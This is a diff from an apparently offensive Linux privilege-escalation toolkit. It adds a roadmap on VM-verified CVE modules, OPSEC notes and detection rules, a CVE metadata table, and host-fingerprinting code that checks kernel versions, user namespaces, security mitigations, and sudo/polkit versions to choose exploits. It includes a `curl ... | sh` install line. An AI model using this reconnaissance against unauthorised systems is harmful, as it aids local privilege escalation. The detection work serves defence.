+and pinned fix commits first (tracked under Phase 7+ above) before any
+full-chain work is meaningful.
+
+## Phase 9 — Empirical verification + operator briefing (DONE 2026-05-23, v0.7.1)
+
+The largest single jump in trust signal: every claim in the corpus is
+now backed by either a unit test (88-test harness) or a real-VM
+verification record (22 of 26 CVEs), and the binary surfaces both.
+
+- [x] **`tools/verify-vm/`** — Vagrant + Parallels scaffold. Boots
+      known-vulnerable kernels (stock distro + mainline via
+      `kernel.ubuntu.com/mainline/`), runs `--explain --active` per
+      module, emits JSONL verification records.
+- [x] **Mainline kernel fetch** — `targets.yaml` `mainline_version`
+      field downloads vanilla mainline .debs from
+      `kernel.ubuntu.com/mainline/v<X.Y.Z>/amd64/`, dpkg-installs,
+      `update-grub`s, reboots. Unblocks pin-not-in-apt targets.
+- [x] **22 of 26 CVEs verified** across Ubuntu 18.04 / 20.04 / 22.04 +
+      Debian 11 / 12 + mainline 5.15.5 / 6.1.10. Records in
+      `docs/VERIFICATIONS.jsonl`, baked into `core/verifications.{c,h}`,
+      surfaced in `--list` (VFY column), `--module-info`, `--explain`,
+      `--scan --json`.
+- [x] **`--explain MODULE`** — one-page operator briefing. CVE / CWE /
+      MITRE ATT&CK / CISA KEV header, host fingerprint, live `detect()`
+      trace with verdict + interpretation, OPSEC footprint, detection-
+      rule coverage, verified-on records. Paste-into-ticket ready.
+- [x] **Per-module `opsec_notes`** — every module struct ships a
+      runtime-footprint paragraph (file artifacts, dmesg, syscall
+      observables, network, persistence, cleanup). The inverse of the
+      detection rules.
+- [x] **CVE metadata pipeline** — `tools/refresh-cve-metadata.py`
+      fetches CISA KEV + NVD CWE; 10 of 26 modules cover KEV-listed
+      CVEs. Hand-curated ATT&CK mapping (T1068 / T1611 / T1082).
+      Surfaced everywhere (`★` markers, `triage` JSON sub-object).
+- [x] **119 detection rules across all 4 SIEM formats** — auditd
+      30/31, sigma 31/31, yara 28/31, falco 30/31. Documented
+      intentional skips for the 3 modules without applicable rules
+      in each format (entrybleed: pure timing side-channel;
+      ptrace_traceme + sudo_samedit: pure-memory races, no on-disk
+      artifacts).
+- [x] **88-test unit harness** — 33 kernel_range / host-fingerprint
+      boundary tests + 55 detect() integration tests. ASan + UBSan
+      + clang-tidy on every push; weekly cron checks for CISA KEV
+      + Debian security-tracker drift.
+- [x] **arm64-static binary** — `skeletonkey-arm64-static` published
+      alongside x86_64-static. Built via `dockcross/linux-arm64-musl`
+      cross toolchain. `install.sh` auto-picks on aarch64 hosts.
+- [x] **`arch_support` field** per module: `any` (4 — userspace
+      bugs), `x86_64` (1 — entrybleed by physics),
+      `x86_64+unverified-arm64` (26 — kernel modules whose arm64
+      exploit hasn't been empirically confirmed). Honest labels until
+      an arm64 verification sweep promotes them.
+- [x] **Marketing-grade landing page** — animated hero with
+      `--explain` showcase, bento-grid features, KEV / verification
+      stat chips, open-graph card. karazajac.github.io/SKELETONKEY.
+
+**Open follow-ups from v0.7.x (not yet started):**
+
+- [ ] arm64 verification sweep — Vagrant arm64 box (e.g.
+      `generic/debian12-arm64` on M-series Mac via Parallels) → run
+      `verify.sh` against the 26 `x86_64+unverified-arm64` modules,
+      promote each to `any` where it works.
+- [ ] SIEM query templates — full Splunk SPL / Elastic KQL / Sentinel
+      KQL queries per top-10 KEV-listed modules, embedded in
+      `docs/DETECTION_PLAYBOOK.md`.
+- [ ] `install.sh` CI smoke test — boot fresh Ubuntu / Debian /
+      Alpine containers, run `curl ... | sh`, assert `--version`.
+- [ ] PackageKit provisioner for pack2theroot VULNERABLE-path
+      verification on Debian 12.
+- [ ] Custom ≤ 4.4 kernel image for dirty_cow VM verification.
+- [ ] 9 deferred TOO_TIGHT kernel-range drift findings — per-commit
+      verification against git.kernel.org/linus.
+
+**Wait-for-upstream blockers (out of our control):**
+
+- vmwgfx verification — requires a VMware-Fusion-or-Workstation
+  guest exposing `/dev/dri/card*` from the vmwgfx driver.
+- dirtydecrypt + fragnesia verification — both target Linux 7.0+,
+  which isn't shipping as any distro kernel yet.

 ## Non-goals

@@ -0,0 +1,303 @@
+/*
+ * SKELETONKEY — CVE metadata table
+ *
+ * AUTO-GENERATED by tools/refresh-cve-metadata.py from
+ * docs/CVE_METADATA.json. Do not hand-edit; rerun the script.
+ * Sources: CISA KEV catalog + NVD CVE API 2.0.
+ */
+
+#include "cve_metadata.h"
+
+#include <stddef.h>
+#include <string.h>
+
+const struct cve_metadata cve_metadata_table[] = {
+    {
+        .cve                 = "CVE-2016-5195",
+        .cwe                 = "CWE-362",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-03-03",
+    },
+    {
+        .cve                 = "CVE-2017-7308",
+        .cwe                 = "CWE-681",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2019-13272",
+        .cwe                 = NULL,
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2021-12-10",
+    },
+    {
+        .cve                 = "CVE-2020-14386",
+        .cwe                 = "CWE-250",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2021-22555",
+        .cwe                 = "CWE-787",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2025-10-06",
+    },
+    {
+        .cve                 = "CVE-2021-3156",
+        .cwe                 = "CWE-193",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-04-06",
+    },
+    {
+        .cve                 = "CVE-2021-33909",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2021-3493",
+        .cwe                 = "CWE-270",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-10-20",
+    },
+    {
+        .cve                 = "CVE-2021-4034",
+        .cwe                 = "CWE-787",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-06-27",
+    },
+    {
+        .cve                 = "CVE-2022-0185",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2024-08-21",
+    },
+    {
+        .cve                 = "CVE-2022-0492",
+        .cwe                 = "CWE-287",
+        .attack_technique    = "T1611",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2022-0847",
+        .cwe                 = "CWE-665",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2022-04-25",
+    },
+    {
+        .cve                 = "CVE-2022-25636",
+        .cwe                 = "CWE-269",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2022-2588",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-0179",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-0386",
+        .cwe                 = "CWE-282",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2025-06-17",
+    },
+    {
+        .cve                 = "CVE-2023-0458",
+        .cwe                 = "CWE-476",
+        .attack_technique    = "T1082",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-2008",
+        .cwe                 = "CWE-129",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-22809",
+        .cwe                 = "CWE-269",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-32233",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-3269",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2023-4622",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2024-1086",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2024-05-30",
+    },
+    {
+        .cve                 = "CVE-2026-31635",
+        .cwe                 = "CWE-130",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2026-41651",
+        .cwe                 = "CWE-367",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2026-46300",
+        .cwe                 = NULL,
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    /* v0.8.0 / v0.9.0 module additions — populated via direct CISA KEV
+     * + NVD curl on 2026-05-24 when refresh-cve-metadata.py's urlopen
+     * hung on CISA's HTTP/2 endpoint. Same data, different transport. */
+    {
+        .cve                 = "CVE-2018-14634",
+        .cwe                 = "CWE-190",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2026-01-26",
+    },
+    {
+        .cve                 = "CVE-2019-14287",
+        .cwe                 = "CWE-755",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2020-29661",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2024-26581",
+        .cwe                 = NULL,  /* NVD: no CWE assigned */
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2024-50264",
+        .cwe                 = "CWE-416",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2025-32463",
+        .cwe                 = "CWE-829",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = true,
+        .kev_date_added      = "2025-09-29",
+    },
+    {
+        .cve                 = "CVE-2025-6019",
+        .cwe                 = "CWE-250",
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+    {
+        .cve                 = "CVE-2026-43494",
+        .cwe                 = NULL,  /* NVD: no CWE assigned */
+        .attack_technique    = "T1068",
+        .attack_subtechnique = NULL,
+        .in_kev              = false,
+        .kev_date_added      = "",
+    },
+};
+
+const size_t cve_metadata_table_len =
+    sizeof(cve_metadata_table) / sizeof(cve_metadata_table[0]);
+
+const struct cve_metadata *cve_metadata_lookup(const char *cve)
+{
+    if (!cve) return NULL;
+    for (size_t i = 0; i < cve_metadata_table_len; i++) {
+        if (strcmp(cve_metadata_table[i].cve, cve) == 0)
+            return &cve_metadata_table[i];
+    }
+    return NULL;
+}
@@ -0,0 +1,43 @@
+/*
+ * SKELETONKEY — CVE metadata lookup
+ *
+ * Per-CVE annotations sourced from authoritative federal databases:
+ *   - CISA Known Exploited Vulnerabilities catalog (in_kev, date_added)
+ *   - NVD CVE API (cwe)
+ *   - Hand-curated MITRE ATT&CK technique mapping
+ *
+ * Kept separate from struct skeletonkey_module because these are
+ * properties of the CVE (one CVE -> one set of values), not the
+ * exploit module. Two modules covering the same CVE see the same
+ * metadata. The OPSEC notes — which vary by exploit technique —
+ * stay on the module struct.
+ *
+ * The table is auto-generated from docs/CVE_METADATA.json by
+ * tools/refresh-cve-metadata.py. Do not hand-edit cve_metadata.c —
+ * re-run the refresh tool.
+ */
+
+#ifndef SKELETONKEY_CVE_METADATA_H
+#define SKELETONKEY_CVE_METADATA_H
+
+#include <stdbool.h>
+#include <stddef.h>
+
+struct cve_metadata {
+    const char *cve;                  /* "CVE-YYYY-NNNNN" */
+    const char *cwe;                  /* "CWE-NNN" or NULL if NVD has no mapping */
+    const char *attack_technique;     /* "T1068" etc. */
+    const char *attack_subtechnique;  /* "T1068.001" or NULL */
+    bool        in_kev;               /* true iff in CISA's KEV catalog */
+    const char *kev_date_added;       /* "YYYY-MM-DD" or "" */
+};
+
+/* The full table. Length is `cve_metadata_table_len`. */
+extern const struct cve_metadata cve_metadata_table[];
+extern const size_t              cve_metadata_table_len;
+
+/* Lookup by CVE id (e.g. "CVE-2024-1086"). Returns NULL if the CVE
+ * isn't in the table. Cheap linear scan; we have <100 entries. */
+const struct cve_metadata *cve_metadata_lookup(const char *cve);
+
+#endif /* SKELETONKEY_CVE_METADATA_H */
@@ -0,0 +1,355 @@
+/*
+ * SKELETONKEY — host fingerprint implementation
+ *
+ * Lives behind a one-shot lazy-init: skeletonkey_host_get() probes on
+ * first call, stores into a file-static, and returns the same pointer
+ * forever after. Single-threaded (skeletonkey is single-threaded), so
+ * no synchronisation needed.
+ */
+
+#include "host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/utsname.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <pwd.h>
+
+#ifdef __linux__
+#include <sched.h>
+#include <sys/wait.h>
+#endif
+
+static struct skeletonkey_host g_host;
+static bool g_host_ready = false;
+
+/* ── small parser helpers ─────────────────────────────────────────── */
+
+/* Copy the value of a `KEY=VAL` line (stripping leading quotes and
+ * trailing quote / newline) into `dst`. Caller passes the start of the
+ * value (after `=`). Cap is the size of dst including NUL. */
+static void parse_os_release_value(const char *s, char *dst, size_t cap)
+{
+	const char *p = s;
+	if (*p == '"' || *p == '\'') p++;
+	size_t L = strcspn(p, "\"'\n");
+	if (L >= cap) L = cap - 1;
+	memcpy(dst, p, L);
+	dst[L] = '\0';
+}
+
+static bool path_exists(const char *p)
+{
+	struct stat st;
+	return stat(p, &st) == 0;
+}
+
+#ifdef __linux__
+/* Sysctl/sys-fs readers — Linux-only consumers (populate_caps). */
+static bool read_int_file(const char *path, int *out)
+{
+	FILE *f = fopen(path, "r");
+	if (!f) return false;
+	int v;
+	int n = fscanf(f, "%d", &v);
+	fclose(f);
+	if (n != 1) return false;
+	*out = v;
+	return true;
+}
+
+static bool read_first_line(const char *path, char *dst, size_t cap)
+{
+	FILE *f = fopen(path, "r");
+	if (!f) return false;
+	if (!fgets(dst, (int)cap, f)) { fclose(f); return false; }
+	fclose(f);
+	size_t n = strlen(dst);
+	while (n > 0 && (dst[n-1] == '\n' || dst[n-1] == '\r')) dst[--n] = '\0';
+	return true;
+}
+#endif
+
+/* ── populators ───────────────────────────────────────────────────── */
+
+static void populate_kernel(struct skeletonkey_host *h)
+{
+	struct utsname u;
+	if (uname(&u) == 0) {
+		/* utsname.machine/nodename can be up to 65 bytes on glibc; the
+		 * %.*s precision spec tells gcc the snprintf is bounded so it
+		 * does not warn about possible truncation (we WANT truncation;
+		 * the snprintf already caps). */
+		snprintf(h->arch,     sizeof h->arch,
+			 "%.*s", (int)sizeof(h->arch) - 1, u.machine);
+		snprintf(h->nodename, sizeof h->nodename,
+			 "%.*s", (int)sizeof(h->nodename) - 1, u.nodename);
+	}
+	/* kernel_version_current owns the static release-string buffer
+	 * and the parser — reuse it to keep one source of truth. */
+	kernel_version_current(&h->kernel);
+}
+
+static void populate_distro(struct skeletonkey_host *h)
+{
+	snprintf(h->distro_id,         sizeof h->distro_id,         "?");
+	snprintf(h->distro_version_id, sizeof h->distro_version_id, "?");
+	snprintf(h->distro_pretty,     sizeof h->distro_pretty,     "?");
+
+	FILE *f = fopen("/etc/os-release", "r");
+	if (!f) return;
+	char line[256];
+	while (fgets(line, sizeof line, f)) {
+		if (strncmp(line, "ID=", 3) == 0)
+			parse_os_release_value(line + 3,
+				h->distro_id, sizeof h->distro_id);
+		else if (strncmp(line, "VERSION_ID=", 11) == 0)
+			parse_os_release_value(line + 11,
+				h->distro_version_id, sizeof h->distro_version_id);
+		else if (strncmp(line, "PRETTY_NAME=", 12) == 0)
+			parse_os_release_value(line + 12,
+				h->distro_pretty, sizeof h->distro_pretty);
+	}
+	fclose(f);
+}
+
+static void populate_user(struct skeletonkey_host *h)
+{
+	h->euid = geteuid();
+	h->egid = getegid();
+	h->is_root = (h->euid == 0);
+	h->is_ssh_session = (getenv("SSH_CONNECTION") != NULL);
+
+	h->username[0] = '\0';
+	struct passwd *pw = getpwuid(h->euid);
+	if (pw && pw->pw_name)
+		snprintf(h->username, sizeof h->username, "%s", pw->pw_name);
+
+	/* Default: real_uid == euid (no userns). Try /proc/self/uid_map to
+	 * discover the outer uid if we're inside a user namespace. Format
+	 *
+	 *   "0 0 4294967295"      → init ns, outer == 0
+	 *   "0 1000 1"            → userns mapped, outer == 1000
+	 *
+	 * Only trust outer != 0 and != -1 as the bypass-userns case. */
+	h->real_uid = h->euid;
+	int fd = open("/proc/self/uid_map", O_RDONLY);
+	if (fd >= 0) {
+		char buf[256];
+		ssize_t n = read(fd, buf, sizeof buf - 1);
+		close(fd);
+		if (n > 0) {
+			buf[n] = '\0';
+			int inner = -1, outer = -1, count = 0;
+			if (sscanf(buf, "%d %d %d", &inner, &outer, &count) == 3 &&
+			    inner == 0 && outer > 0)
+				h->real_uid = (uid_t)outer;
+		}
+	}
+}
+
+static void populate_platform_family(struct skeletonkey_host *h)
+{
+#ifdef __linux__
+	h->is_linux = true;
+#else
+	h->is_linux = false;
+#endif
+	h->is_debian_family = path_exists("/etc/debian_version");
+	h->is_rpm_family    = path_exists("/etc/redhat-release") ||
+	                      path_exists("/etc/fedora-release") ||
+	                      path_exists("/etc/rocky-release") ||
+	                      path_exists("/etc/almalinux-release");
+	h->is_arch_family   = path_exists("/etc/arch-release");
+	h->is_suse_family   = path_exists("/etc/SuSE-release") ||
+	                      path_exists("/etc/SUSE-brand");
+}
+
+#ifdef __linux__
+/* fork+unshare(CLONE_NEWUSER) probe. Forks once; ~1ms cost. */
+static bool userns_probe(void)
+{
+	pid_t pid = fork();
+	if (pid < 0) return false;
+	if (pid == 0) {
+		_exit(unshare(CLONE_NEWUSER) == 0 ? 0 : 1);
+	}
+	int st;
+	if (waitpid(pid, &st, 0) < 0) return false;
+	return WIFEXITED(st) && WEXITSTATUS(st) == 0;
+}
+#endif
+
+static void populate_caps(struct skeletonkey_host *h)
+{
+	h->unprivileged_userns_allowed = false;
+	h->apparmor_restrict_userns    = false;
+	h->unprivileged_bpf_disabled   = false;
+	h->kpti_enabled                = false;
+	h->meltdown_mitigation[0]      = '\0';
+	h->kernel_lockdown_active      = false;
+	h->selinux_enforcing           = false;
+	h->yama_ptrace_restricted      = false;
+
+#ifdef __linux__
+	h->unprivileged_userns_allowed = userns_probe();
+
+	int v = 0;
+	if (read_int_file("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", &v))
+		h->apparmor_restrict_userns = (v != 0);
+	if (read_int_file("/proc/sys/kernel/unprivileged_bpf_disabled", &v))
+		h->unprivileged_bpf_disabled = (v != 0);
+	if (read_int_file("/sys/fs/selinux/enforce", &v))
+		h->selinux_enforcing = (v != 0);
+	if (read_int_file("/proc/sys/kernel/yama/ptrace_scope", &v))
+		h->yama_ptrace_restricted = (v > 0);
+
+	char buf[256];
+	if (read_first_line("/sys/devices/system/cpu/vulnerabilities/meltdown", buf, sizeof buf)) {
+		h->kpti_enabled = (strstr(buf, "Mitigation: PTI") != NULL);
+		/* Stash the raw value so modules that need richer matching
+		 * (e.g. entrybleed distinguishing "Not affected" CPUs from
+		 * "Vulnerable" / "Mitigation: PTI") don't re-read sysfs. */
+		size_t L = strlen(buf);
+		if (L >= sizeof h->meltdown_mitigation)
+			L = sizeof h->meltdown_mitigation - 1;
+		memcpy(h->meltdown_mitigation, buf, L);
+		h->meltdown_mitigation[L] = '\0';
+	}
+
+	/* /sys/kernel/security/lockdown format: "[none] integrity confidentiality"
+	 * — whichever level is bracketed is the active one. */
+	if (read_first_line("/sys/kernel/security/lockdown", buf, sizeof buf))
+		h->kernel_lockdown_active = (strstr(buf, "[none]") == NULL);
+#endif
+}
+
+static void populate_services(struct skeletonkey_host *h)
+{
+	h->has_systemd     = path_exists("/run/systemd/system");
+	h->has_dbus_system = path_exists("/run/dbus/system_bus_socket");
+}
+
+/* Best-effort: run `cmd`, capture first stdout line, strip newline,
+ * copy up to (cap - 1) bytes into dst. Returns true iff popen
+ * succeeded, the command exited 0, and we got at least one line.
+ * Used for sudo/pkexec/packagekitd version parsing at startup. */
+static bool capture_first_line(const char *cmd, char *dst, size_t cap)
+{
+	dst[0] = '\0';
+	FILE *p = popen(cmd, "r");
+	if (!p) return false;
+	char buf[256];
+	bool got = (fgets(buf, sizeof buf, p) != NULL);
+	int rc = pclose(p);
+	if (!got || rc != 0) return false;
+	size_t L = strlen(buf);
+	while (L > 0 && (buf[L-1] == '\n' || buf[L-1] == '\r'))
+		buf[--L] = '\0';
+	if (L >= cap) L = cap - 1;
+	memcpy(dst, buf, L);
+	dst[L] = '\0';
+	return true;
+}
+
+/* Extract the version-string token from a line of the form
+ * "<prefix>: <version> [rest]" or "<prefix> <version> [rest]". The
+ * version token is everything from the first non-space after
+ * `prefix` up to the next whitespace. Empty result when prefix not
+ * found. */
+static void extract_version_after_prefix(const char *line,
+					 const char *prefix,
+					 char *dst, size_t cap)
+{
+	dst[0] = '\0';
+	const char *p = strstr(line, prefix);
+	if (!p) return;
+	p += strlen(prefix);
+	while (*p == ' ' || *p == ':' || *p == '\t') p++;
+	size_t i = 0;
+	while (*p && *p != ' ' && *p != '\t' && i + 1 < cap)
+		dst[i++] = *p++;
+	dst[i] = '\0';
+}
+
+static void populate_userspace_versions(struct skeletonkey_host *h)
+{
+	h->sudo_version[0]   = '\0';
+	h->polkit_version[0] = '\0';
+
+	char line[256];
+	if (capture_first_line("sudo -V 2>/dev/null", line, sizeof line))
+		extract_version_after_prefix(line, "Sudo version",
+			h->sudo_version, sizeof h->sudo_version);
+
+	if (capture_first_line("pkexec --version 2>/dev/null", line, sizeof line))
+		extract_version_after_prefix(line, "pkexec version",
+			h->polkit_version, sizeof h->polkit_version);
+}
+
+/* ── public entrypoints ───────────────────────────────────────────── */
+
+const struct skeletonkey_host *skeletonkey_host_get(void)
+{
+	if (g_host_ready) return &g_host;
+
+	memset(&g_host, 0, sizeof g_host);
+	populate_kernel(&g_host);
+	populate_distro(&g_host);
+	populate_user(&g_host);
+	populate_platform_family(&g_host);
+	populate_caps(&g_host);
+	populate_services(&g_host);
+	populate_userspace_versions(&g_host);
+	g_host.probe_source = "skeletonkey core/host.c";
+	g_host_ready = true;
+	return &g_host;
+}
+
+bool skeletonkey_host_kernel_at_least(const struct skeletonkey_host *h,
+				      int major, int minor, int patch)
+{
+	if (!h || h->kernel.major == 0)
+		return false;
+	if (h->kernel.major != major) return h->kernel.major > major;
+	if (h->kernel.minor != minor) return h->kernel.minor > minor;
+	return h->kernel.patch >= patch;
+}
+
+bool skeletonkey_host_kernel_in_range(const struct skeletonkey_host *h,
+				      int lo_M, int lo_m, int lo_p,
+				      int hi_M, int hi_m, int hi_p)
+{
+	return  skeletonkey_host_kernel_at_least(h, lo_M, lo_m, lo_p) &&
+	       !skeletonkey_host_kernel_at_least(h, hi_M, hi_m, hi_p);
+}
+
+void skeletonkey_host_print_banner(const struct skeletonkey_host *h, bool json)
+{
+	if (json || h == NULL) return;
+	fprintf(stderr, "[*] host: %s%s%s  kernel=%s  arch=%s  distro=%s/%s\n",
+		h->nodename[0] ? h->nodename : "?",
+		h->is_root ? "  (ROOT)" : "",
+		h->is_ssh_session ? "  (SSH)" : "",
+		h->kernel.release ? h->kernel.release : "?",
+		h->arch[0] ? h->arch : "?",
+		h->distro_id[0] ? h->distro_id : "?",
+		h->distro_version_id[0] ? h->distro_version_id : "?");
+	fprintf(stderr, "[*] gates: userns=%s  aa_restrict=%s  bpf_disabled=%s  "
+			"kpti=%s  lockdown=%s  selinux=%s  yama_ptrace=%s\n",
+		h->unprivileged_userns_allowed ? "yes" : "no",
+		h->apparmor_restrict_userns    ? "on"  : "off",
+		h->unprivileged_bpf_disabled   ? "yes" : "no",
+		h->kpti_enabled                ? "on"  : "off",
+		h->kernel_lockdown_active      ? "on"  : "off",
+		h->selinux_enforcing           ? "on"  : "off",
+		h->yama_ptrace_restricted      ? "yes" : "no");
+	if (h->sudo_version[0] || h->polkit_version[0])
+		fprintf(stderr, "[*] userspace: sudo=%s  polkit=%s\n",
+			h->sudo_version[0]   ? h->sudo_version   : "-",
+			h->polkit_version[0] ? h->polkit_version : "-");
+}
@@ -0,0 +1,142 @@
+/*
+ * SKELETONKEY — host fingerprint
+ *
+ * Populated once at startup, before any module's detect() runs. Every
+ * module receives a stable pointer via skeletonkey_ctx.host and can
+ * consult it without re-parsing /proc, /etc/os-release, uname(2), or
+ * forking another userns probe.
+ *
+ * The struct is deliberately POD (no heap pointers, fixed-size
+ * arrays) so lifetime reasoning is trivial. A single static instance
+ * lives in core/host.c; skeletonkey_host_get() returns the same
+ * pointer on every call. The first call probes; subsequent calls
+ * are O(1) lookups.
+ *
+ * Fields that don't apply on a given platform (e.g. AppArmor sysctls
+ * on a non-Linux dev build, KPTI on aarch64) stay at their false /
+ * "?" defaults. Probing is best-effort: a missing sysctl never fails
+ * the call, just leaves the corresponding bool false.
+ */
+
+#ifndef SKELETONKEY_HOST_H
+#define SKELETONKEY_HOST_H
+
+#include "kernel_range.h"
+
+#include <stdbool.h>
+#include <stddef.h>
+#include <sys/types.h>
+
+struct skeletonkey_host {
+	/* ── identity ─────────────────────────────────────────────── */
+
+	struct kernel_version kernel;     /* uname.release parsed */
+	char arch[32];                    /* uname.machine ("x86_64", "aarch64") */
+	char nodename[64];                /* uname.nodename (for log lines) */
+
+	char distro_id[64];               /* /etc/os-release ID ("ubuntu", "debian", "fedora", "?") */
+	char distro_version_id[64];       /* /etc/os-release VERSION_ID ("24.04", "13", "?") */
+	char distro_pretty[128];          /* /etc/os-release PRETTY_NAME for log lines */
+
+	/* ── process state ─────────────────────────────────────────── */
+
+	uid_t euid;                       /* geteuid() */
+	uid_t real_uid;                   /* outer uid (defeats userns illusion via /proc/self/uid_map) */
+	gid_t egid;                       /* getegid() */
+	char username[64];                /* getpwuid(euid)->pw_name or "" */
+	bool is_root;                     /* euid == 0 */
+	bool is_ssh_session;              /* SSH_CONNECTION env var set */
+
+	/* ── platform family ───────────────────────────────────────── */
+
+	bool is_linux;                    /* compiled / running on Linux */
+	bool is_debian_family;            /* /etc/debian_version exists */
+	bool is_rpm_family;               /* redhat / fedora / rocky / almalinux release file */
+	bool is_arch_family;              /* /etc/arch-release */
+	bool is_suse_family;              /* /etc/SuSE-release or /etc/SUSE-brand */
+
+	/* ── capability / gate flags (Linux) ──────────────────────── */
+
+	bool unprivileged_userns_allowed; /* fork+unshare(CLONE_NEWUSER) succeeded */
+	bool apparmor_restrict_userns;    /* sysctl: 1 = AA blocks unpriv userns */
+	bool unprivileged_bpf_disabled;   /* /proc/sys/kernel/unprivileged_bpf_disabled = 1 */
+	bool kpti_enabled;                /* /sys/.../meltdown contains "Mitigation: PTI" */
+	char meltdown_mitigation[64];     /* raw first line of
+	                                   * /sys/devices/system/cpu/vulnerabilities/meltdown
+	                                   * — empty string if unreadable. Modules that need
+	                                   * to distinguish "Not affected" (CPU immune) from
+	                                   * "Mitigation: PTI" / "Vulnerable" can read this. */
+	bool kernel_lockdown_active;      /* /sys/kernel/security/lockdown != [none] */
+	bool selinux_enforcing;           /* /sys/fs/selinux/enforce = 1 */
+	bool yama_ptrace_restricted;      /* /proc/sys/kernel/yama/ptrace_scope > 0 */
+
+	/* ── system services ──────────────────────────────────────── */
+
+	bool has_systemd;                 /* /run/systemd/system exists */
+	bool has_dbus_system;             /* /run/dbus/system_bus_socket exists */
+
+	/* ── userspace component versions ─────────────────────────
+	 * Parsed once at startup via popen() of the relevant binary's
+	 * --version output. Empty string ("") means "tool not installed
+	 * or version parse failed" — modules should treat that as
+	 * PRECOND_FAIL (no exploit target). The exact format mirrors
+	 * what the tool prints (`Sudo version 1.9.5p2`, `pkexec version
+	 * 0.105`, …); modules do their own range parsing. */
+	char sudo_version[64];            /* "1.9.13p1" or "" */
+	char polkit_version[64];          /* "0.105" or "126" or "" */
+
+	/* Informational: the SKELETONKEY component that populated this
+	 * snapshot (for log/JSON output). */
+	const char *probe_source;
+};
+
+/* Get the host fingerprint. Returns a stable, non-null pointer that
+ * lives for the process lifetime. Probes happen lazily on the first
